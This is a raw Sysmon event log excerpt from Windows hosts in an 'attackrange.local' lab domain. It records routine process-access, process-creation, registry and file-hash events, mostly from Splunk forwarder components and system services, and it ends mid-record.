08:03:51.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-710B-00000000CF01}6496C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.637{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-0667-60E8-7503-00000000CF01}5036C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.366{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.352{466BC892-F767-60EB-C57D-00000000CF01}8920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.135{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2A11D8CD71D2735E052EA95B3DB0645,SHA256=60F4581AF32E56C741E1F292DB0036561F8DA5CAFB1C3C61CFAF7D073473C937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.133{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=885EA53639B482B89CA8B87293F77C81,SHA256=16D96374D3EB6953615332385FD2CBDF0CB0C61F4B8D3CDF9DEBF53446C8D4E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:49.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57412-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 13241300x80000000000000001053170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.909{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 13241300x80000000000000001053169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.905{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Config SourceDWORD (0x00000001) 13241300x80000000000000001053168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:52.905{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\6C48E9CC-B771-47F3-A036-36AE114D8798\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_6C48E9CC-B771-47F3-A036-36AE114D8798.XML 10341000x80000000000000001053167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.809{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.804{466BC892-F768-60EB-C77D-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.741{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113A4B37FE81F515DEC11492DF45EB67,SHA256=AB2686075AAD4F2A22778F7626BB453A73002EEC2D6F4F1BF85F54400DD37834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:52.322{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D7727B440512273C99A6A50365AA3C,SHA256=EB5B50454C94873C2DFA1FAF41F1408E1210331C8CC10DECCA943C00DA56E462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.357{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2A11D8CD71D2735E052EA95B3DB0645,SHA256=60F4581AF32E56C741E1F292DB0036561F8DA5CAFB1C3C61CFAF7D073473C937,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:52.290{466BC892-F767-60EB-C67D-00000000CF01}101526852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC179CACA96E2061A56913CDE2E1360D,SHA256=BE0B8D84E92B66535AD34F2F0F5DBFBAE8DB982F123E5D4399EEF3172F592F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7698FE6DBC874910E55920E8CC45DB8,SHA256=CC466007FB3CD449CBD698AB8E6DBD71184860F4043C1A3B1EA46F9068490DD8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.745{466BC892-F769-60EB-C87D-00000000CF01}11489720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:53.354{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=153FA9FDCB8B0190889849A87A228EDD,SHA256=EA766D617FC5548AE86D8B53D99F0BBEB6AA00729AEDAB2B6D7052873DBAA26D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:53.489{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F769-60EB-C87D-00000000CF01}1148C:\Program 